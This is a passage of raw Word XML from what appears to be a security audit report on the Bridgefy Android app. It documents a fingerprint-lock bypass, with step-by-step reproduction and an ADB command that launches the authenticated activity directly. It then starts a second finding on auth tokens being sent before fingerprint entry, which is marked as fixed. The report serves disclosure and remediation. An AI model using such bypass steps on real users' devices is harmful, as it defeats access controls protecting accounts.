          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>fingerprint</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>setting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>On</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Android</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>app,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>enable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>“Use</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>fingerprint</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>unlock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Bridgefy”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>option</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:sz w:val="3"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="3"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487594496">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>2112746</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>43543</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4000500" cy="3562350"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="24" name="Group 24"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvPr id="24" name="Group 24"/>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="4000500" cy="3562350"/>
                          <a:chExt cx="4000500" cy="3562350"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr id="25" name="Image 25"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId50" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1962150" cy="3562350"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr id="26" name="Image 26"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId51" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="2000250" y="0"/>
                            <a:ext cx="2000250" cy="3562350"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group style="position:absolute;margin-left:166.358002pt;margin-top:3.428586pt;width:315pt;height:280.5pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15721984;mso-wrap-distance-left:0;mso-wrap-distance-right:0" id="docshapegroup15" coordorigin="3327,69" coordsize="6300,5610">
                <v:shape style="position:absolute;left:3327;top:68;width:3090;height:5610" type="#_x0000_t75" id="docshape16" stroked="false">
                  <v:imagedata r:id="rId50" o:title=""/>
                </v:shape>
                <v:shape style="position:absolute;left:6477;top:68;width:3150;height:5610" type="#_x0000_t75" id="docshape17" stroked="false">
                  <v:imagedata r:id="rId51" o:title=""/>
                </v:shape>
                <w10:wrap type="topAndBottom"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="84"/>
        <w:ind w:left="354" w:right="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Fig.:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Profile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Settings</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Use</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>fingerprint</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>unlock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Bridgefy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="228"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Step</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>2:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Close</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>launch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>app</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>again</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="365"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Close and launch the Android app. A message will appear showing that the fingerprint must be entered (do not enter the fingerprint).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Step</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>3:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Bypass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Fingerprint</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>prompt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="376"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>From a computer connected to the rooted Android device, run the following ADB </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>command:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>ADB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>adb shell am start</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>me.bridgefy.main.staging/me.bridgefy.main.ux.bridgefy.BridgefyActivity</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="113"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto" w:before="38"/>
        <w:ind w:left="720" w:right="364"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Android</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>app</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>shows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>authenticated</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>portion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>application,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>can now navigate all screens without a valid fingerprint, hence bypassing the intended security control.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="364"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It is recommended to improve the implementation of this feature so the app remains locked regardless of any activities being invoked directly from the command line to resolve this issue.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>BFY-01-016</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>WP1:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Fingerprint</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Bypass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>via</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>High</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="56"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="363"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Retest Notes: </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Fix Verified. The Bridgefy team resolved this issue and 7ASecurity verified that the fix is valid. The staging Android 3.0.16 (1001) build was found to implement the proposed mitigation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="365"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The Android app has a feature that locks the app until a valid fingerprint is provided. It was</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>found</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>application</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>sends</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>requests</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>authentication</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>before the fingerprint is entered by the user. Hence, a malicious attacker, with access to an unlocked device, could leverage this weakness to obtain a valid access token and then send direct requests to the API, effectively defeating the fingerprint implementation and taking over the user account, given that impersonation is possible with these tokens. Please note that to replicate this issue the Fingerprint login option must be enabled first.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>issue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
